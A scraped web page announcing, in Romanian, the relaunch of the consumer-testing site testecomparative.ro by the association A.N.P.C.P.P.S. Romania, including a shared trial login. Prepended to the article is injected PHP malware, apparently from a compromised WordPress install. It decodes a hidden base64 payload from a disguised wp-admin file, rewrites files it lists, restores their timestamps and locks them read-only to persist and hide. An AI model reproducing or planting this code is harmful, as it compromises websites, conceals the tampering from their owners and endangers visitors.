$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } A.N.P.C.P.P.S. Romania a lansat noua versiune a site-ului www.testecomparative.ro – O noua atitudine

Asociatia Nationala pentru Protectia Consumatorilor si Promovarea Programelor si Strategiilor din Romania a lansat noua versiune a  site-ulului www.testecomparative.ro, o varianta updatata si plina de noi informatii si analize comparative pe produse!

Disponibil acum intr-o varianta mult mai dinamica, acest site a fost creat pentru a-i ajuta pe  consumatori sa ia cea mai buna decizie, dandu-le posibilitatea sa afle inainte de a cumpara, modul cum se comporta un produs pe parcursul utilizarii. Practic, acest site reprezinta un suport pentru orientarea pe o piata cu zeci de mii de produse.

A.N.P.C.P.P.S. Romania, partenerul I.C.R.T. (International Consummers Research and Testing), pune la dispozitie zilnic testele pentru mii de produse, incercate in laboratoarele specializate, la nivel international. In diverse institute si laboratoare, produsele pe care le poti achizitiona in calitate de consumator final sunt comparate si testate, tinandu-se cont de nenumarate criterii. Televizoare, masini de spalat, cauciucuri, apa minerala, antivirusi sau autoturisme, sunt doar cateva dintre produsele supuse testelor.

Site-ul www.testecomparative.ro este o platforma pe care puteti regasi integral testele comparative, precum si studiile realizate de A.N.P.C.P.P.S. Romania. Doritorii pot gasi aici pana la 3000 de produse, din toate categoriile. Platforma online ofera si posibilitatea de a vizualiza topurile produselor, realizate de specialisti, in baza notelor obtinute in testele de laborator. Pentru fiecare categorie puteti regasi si o selectie de zece produse, alese dupa notele obtinute pentru consum, fiabilitate, confort sau alte performante tehnice testate.

Pentru a simplifica procesul de cautare a unui produs, platforma are filtre si un motor de cautare intuitiv si inteligent. Cu ajutorul optiunii de comparare disponibila pe testecomparative.ro, poti viualiza si compara simultan rezultatele testelor obtinute de mai multe produse preferate. Mai mult, modulele pentru prezentarea produselor de top fac mai usoara luarea unei decizii de cumparare.

A alege, presupune a compara, asa ca va invitam sa vizitati acest nou site fresh si dinamic,  pentru a fi un consumator informat, in ceea ce priveste produsele achizitionate. Pentru a testa platforma, A.N.P.C.P.P.S. Romania iti pune la dispozitie cu titlu gratuit un cod si o parola, valabile timp de sapte zile pe site-ul www.testecomparative.ro. Numele de utilizator este infocons, iar parola este infocons. Profita acum de aceasta ocazie si familiarizeaza-te cu acest concept european de testare comparativa a produselor!
Va asiguram ca poate deveni cel mai bun consilier cand vine vorba de cumparaturi!

By o9admin